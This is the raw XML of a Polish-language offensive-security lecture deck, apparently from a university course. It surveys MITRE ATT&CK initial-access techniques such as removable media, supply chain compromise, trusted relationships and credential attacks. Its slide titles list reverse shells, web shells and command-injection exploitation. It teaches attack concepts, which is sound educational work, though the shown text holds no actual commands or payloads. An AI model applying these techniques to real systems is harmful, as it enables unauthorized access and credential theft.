              <a:t>) mające na celu wykradnięcie hasha NTLM (Windows) celem złamania hasła atakiem słownikowym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zawartość (HTML, JavaScript) wykorzystującą element socjotechniki, skłaniające użytkownika do interakcji prowadzącej do pobrania i wykonania na swoim systemie złośliwego kodu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/>
              <a:t>exploit wykorzystujące luki w innych aplikacjach webowych będących celem (kradzież tokenów OAuth, ataki Cross-Site Scripting/Cross-Site Request Forgery)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3674132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Replication Through Removable Media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2198256"/>
            <a:ext cx="111482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Wektor ataku wykorzystuje przenośne nośniki pamięci (aktualnie pendrive'y USB, kiedyś były to dyskietki, później płyty CD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL"/>
              <a:t>😃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="27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Stosowany do atakowania systemów fizycznie odizolowanych od sieci (ang. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1"/>
              <a:t>airgapped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="27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/>
              <a:t>Wykorzystuje mechanizmy takie jak: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autorun (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1"/>
              <a:t>autorun.inf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="27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modyfikacje oryginalnych instalatorów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modyfikacje samego firmware urządzenia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/>
              <a:t>mylące nazwy plików</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4041000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Supply Chain Compromise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835946"/>
            <a:ext cx="1147884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Złośliwe zmodyfikowanie produktów lub kanałów ich dostawy przed otrzymaniem ich przez ofiarę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/>
              <a:t>Może mieć miejsce na dowolnym etapie dostarczania, np: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narzędzi deweloperskich przeznaczonych do wytworzenia plików wykonywalnych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środowiska deweloperskiego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repozytoriów z kodem źródłowym (publicznych/prywatnych)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kodu zależności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manipulacja mechanizmów aktualizacji/dystrybucji oprogramowania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 nośników na etapie produkcji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sprzedaż zmodyfikowanych wersji legalnym dystrybutorom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modyfikacja/zamiaina nośników poprzez przechwycenie ich dostawy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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64718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Czym jest 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372687" y="1584703"/>
            <a:ext cx="11446625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Bezpieczeństwo jest ściśle powiązane z pojęciem konfliktu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Z tego też wywodzi się terminologia (ofensywa - ang. offense, defensywa - ang. defense)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ofensywa = atak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ofensywa jest aktywnością skupioną na wrogim (mającym na celu wyrządzenie szkody) działaniu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stąd też wiele używanych tutaj terminów wywodzi się z wojskowości (np. ang. "objective", "operator", "war room", "kill chain", itd.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2615741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Trusted Relationship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812800" y="1318362"/>
            <a:ext cx="1114829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Wykorzystanie relacji zaufania między ofiarą a stroną trzecią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Zaatakowanie zaufanego ofierze podmiotu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organizacji (np. dostawcy, klienta, partnera biznesowego, instytucji)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osoby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infrastruktury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765891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Initial Access - Valid Accounts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773F9-D4E9-4A0D-AA66-9920B9E89883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="916317" y="1111328"/>
            <a:ext cx="11148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Wykorzystanie prawidłowych, istniejących w atakowanym systemie poświadczeń (ang. credentials) - najczęściej jest to po prostu nazwa użytkownika i hasło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Funkcjonuje kilka metod zdobywania prawidłowych poświadczeń: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Ataki oparte o statystykę (w miarę możliwości poprzedzone ustalaniem listy prawidłowych istniejących kont - ang. account enumeration):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Brute force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spraying!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reuse (określany również jako credential stuffing)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500"/>
              <a:t>Password mutation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Uzyskiwanie haseł w wyniku ataków phishingowych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/>
              <a:t>Wydobywanie haseł z innych, już skompromitowanych systemów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819961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ATT&amp;CK for Enterprise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F0E95-3A85-4D35-8D11-0610E2F05A33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1189516" y="6488668"/>
            <a:ext cx="833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://attack.mitre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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.org/matrices/enterprise/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34FC6-1A9D-4D1C-B444-53A486F3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9" y="1055594"/>
            <a:ext cx="10715047" cy="5098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61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#III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Czym jest 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372687" y="1300032"/>
            <a:ext cx="11446625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Działania ofensywne prowadzą do osiągnięcia celu w sposób nieautoryzowany (wbrew woli i bez zgody/wiedzy  podmiotu będącego celem)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Tematem zajęć jest domena IT (cyberbezpieczeństwo)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/>
              <a:t>Bezpieczeństwo ofensywne skupia się na nieautoryzowanym przejmowaniu kontroli nad systemami i nieautoryzowanym uzyskiwaniem dostępu do informacji</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223884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Fundamentalne różnice między defensywą a ofensywą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2040201"/>
            <a:ext cx="11446625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Defensywa i ofensywa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1"/>
              <a:t>nie są symetryczne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lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2800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/>
              <a:t>NIE SĄ TO "dwie strony tej samej monety" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>(mimo, że może się tak na pozór wydawać, sam jeszcze niedawno w to wierzyłem )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1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593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ofensywne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450410"/>
            <a:ext cx="11446625" cy="54784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jest aktywne (zarówno w teorii jak i praktyce)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kreatywne (odkrywa nowe podatności, wynajduje nowe metody ataków)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decydujący wpływ na to, kiedy i jak przeprowadzony zostanie atak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zawsze wykonuje pierwszy krok (przewaga)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większy wpływ na bieg wydarzeń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/>
              <a:t>ma większy wpływ na reguły gry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="28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387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255882" y="78872"/>
            <a:ext cx="12035763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Bezpieczeństwo defensywne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550450" y="1450410"/>
            <a:ext cx="11446625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reaktywne (jest reakcją/wynikiem/efektem ubocznym/konsekwencją działań ofensywnych)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nowe zabezpieczenia są odpowiedzią na nowe metody ataków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nawet, gdy defensywa jest proaktywna i wykonuje kroki wyprzedzające...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... są one wynikiem zdolności broniących do myślenia ofensywnego (przewidywanie i wyprzedzanie działań atakujących)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Powszechnie mawia się: "jeśli chcesz złapać hakera, musisz myśleć jak on"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Ja preferuję sformułowanie: "do pokonania hakera potrzebny jest inny haker"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398444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3473</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>371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Złośliwe oprogramowanie - ang. Malware</vt:lpstr>
      <vt:lpstr>Złośliwe oprogramowanie - ang. Malware</vt:lpstr>
      <vt:lpstr>Złośliwe oprogramowanie - ang. Malware</vt:lpstr>
      <vt:lpstr>Złośliwe oprogramowanie - ang. Malware</vt:lpstr>
      <vt:lpstr>"Tylna furtka" - ang. backdoor</vt:lpstr>
      <vt:lpstr>Shell</vt:lpstr>
      <vt:lpstr>Shell jako podstawowe narzędzie kontroli zdobytego systemu</vt:lpstr>
      <vt:lpstr>Remote shell (C2) - rodzaje</vt:lpstr>
      <vt:lpstr>Remote Shell - Web</vt:lpstr>
      <vt:lpstr>Remote Shell - Bind</vt:lpstr>
      <vt:lpstr>Remote Shell - Bind</vt:lpstr>
      <vt:lpstr>Remote Shell - reverse</vt:lpstr>
      <vt:lpstr>Reverse shell w akcji</vt:lpstr>
      <vt:lpstr>Reverse shell w akcji</vt:lpstr>
      <vt:lpstr>Reverse shell w akcji</vt:lpstr>
      <vt:lpstr>Exploitacja OS command injection - reverse shell</vt:lpstr>
      <vt:lpstr>Exploitacja OS command injection - download &amp; exec</vt:lpstr>
      <vt:lpstr>Eksploitacja RCE - payload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 Horoszkiewicz</cp:lastModifiedBy>
  <cp:revision>491</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-02-01T16:36:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-07T15:02:40Z</dcterms:modified>
</cp:coreProperties>
</file>